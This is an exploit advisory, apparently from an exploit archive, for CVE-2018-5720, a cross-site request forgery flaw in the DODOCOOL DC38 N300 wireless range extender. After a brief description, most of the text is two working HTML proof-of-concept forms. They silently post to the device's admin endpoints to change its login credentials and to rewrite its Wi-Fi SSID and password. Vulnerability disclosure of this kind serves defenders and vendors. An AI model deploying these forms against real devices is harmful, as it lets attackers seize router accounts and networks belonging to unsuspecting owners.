Dodocool DC38 N300 Cross Site Request Forgery

Dodocool DC38 N300 suffers from a cross site request forgery vulnerability.


MD5 | 524927f3c926884a4b4f0446ec0c92de

# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
# Date: 17-01-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: DODOCOOL
# Vendor Homepage: www.dodocool.com
# Version: RTN2-AW.GD.R3465.1.20161103
# CVE: CVE-2018-5720

I DESCRIPTION
========================================================================

An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery
(CSRF) vulnerability allows remote attackers to hijack the authentication
of users for requests that modify the configuration.
This vulnerability may lead to username and/or password changing, Wi-Fi
password changing, etc.

II PROOF OF CONCEPT
========================================================================

## Change user username and password (test_username:test_password):

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.10.1/boafrm/formPasswordSetup"
method="POST">
<input type="hidden" name="submit-url"
value="/setok.htm?bw=main.htm" />
<input type="hidden" name="submit-value" value="" />
<input type="hidden" name="username" value="test_username" />
<input type="hidden" name="newpass" value="test_password" />
<input type="hidden" name="confpass" value="test_password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


## Change WiFi Configuration (WIFI_TEST:TestTest):

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.10.1/boafrm/formWlanSetupREP"
method="POST">
<input type="hidden" name="submit-url"
value="/setok.htm?bw=wl_rep.htm" />
<input type="hidden" name="submit-value" value="repset" />
<input type="hidden" name="wl_onoff" value="0" />
<input type="hidden"
name="wps_clear_configure_by_reg" value="0" />
<input type="hidden" name="wlProfileId" value="" />
<input type="hidden" name="wl_mode" value="0" />
<input type="hidden" name="wl_authType" value="auto" />
<input type="hidden" name="wepEnabled" value="ON" />
<input type="hidden" name="weplength" value="" />
<input type="hidden" name="wepformat" value="" />
<input type="hidden" name="wl_wpaAuth" value="psk" />
<input type="hidden" name="wl_pskFormat" value="0" />
<input type="hidden" name="wl_pskValue" value="TestTest" />
<input type="hidden" name="wl_ssid" value="WIFI_TEST" />
<input type="hidden" name="wl_Method" value="6" />
<input type="hidden" name="wep_key" value="" />
<input type="hidden" name="ciphersuite" value="tkip+aes" />
<input type="hidden" name="ciphersuite" value="aes" />
<input type="hidden" name="wpa2ciphersuite" value="tkip+aes" />
<input type="hidden" name="wpa2ciphersuite" value="aes" />
<input type="hidden" name="web_pskValue" value="TestTest" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



Related Posts